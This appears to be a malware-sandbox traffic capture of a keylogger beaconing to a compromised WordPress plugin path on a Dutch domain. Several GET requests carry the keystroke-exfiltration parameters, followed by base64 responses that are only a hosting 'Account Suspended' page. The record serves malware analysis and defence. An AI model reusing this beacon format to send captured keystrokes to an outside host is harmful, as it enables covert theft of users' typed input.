GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=8:54%20AM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 302 Found
Date: Fri, 02 Dec 2016 16:54:31 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=8:54%20AM
Content-Length: 379
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
31 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=8:54%20AM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 05/13/53 23:23:33
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=8:54%20AM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Fri, 02 Dec 2016 16:54:31 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
32 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=8:55%20AM text/html post.php 302 Found HTML 379.0 B 05/17/53 21:55:10
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9QzolNUNVc2VycyU1Q0FkbWluaXN0cmF0b3IlNUNE
ZXNrdG9wJTVDbWFsd2FyZSZhbXA7a2V5c3Ryb2tlc3R5cGVkPSZhbXA7bWFjaGluZXRpbWU9ODo1
NSUyMEFNIj5oZXJlPC9hPi48L3A+CjwvYm9keT48L2h0bWw+Cg==
Download
Download
SHA256
e9fc951e313aa666eb6f91fdd482e978337e660494ef7f92c1f951244f6bb708
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=8:55%20AM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 302 Found
Date: Fri, 02 Dec 2016 16:55:05 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=8:55%20AM
Content-Length: 379
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
33 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=8:55%20AM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 05/17/53 22:36:49
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
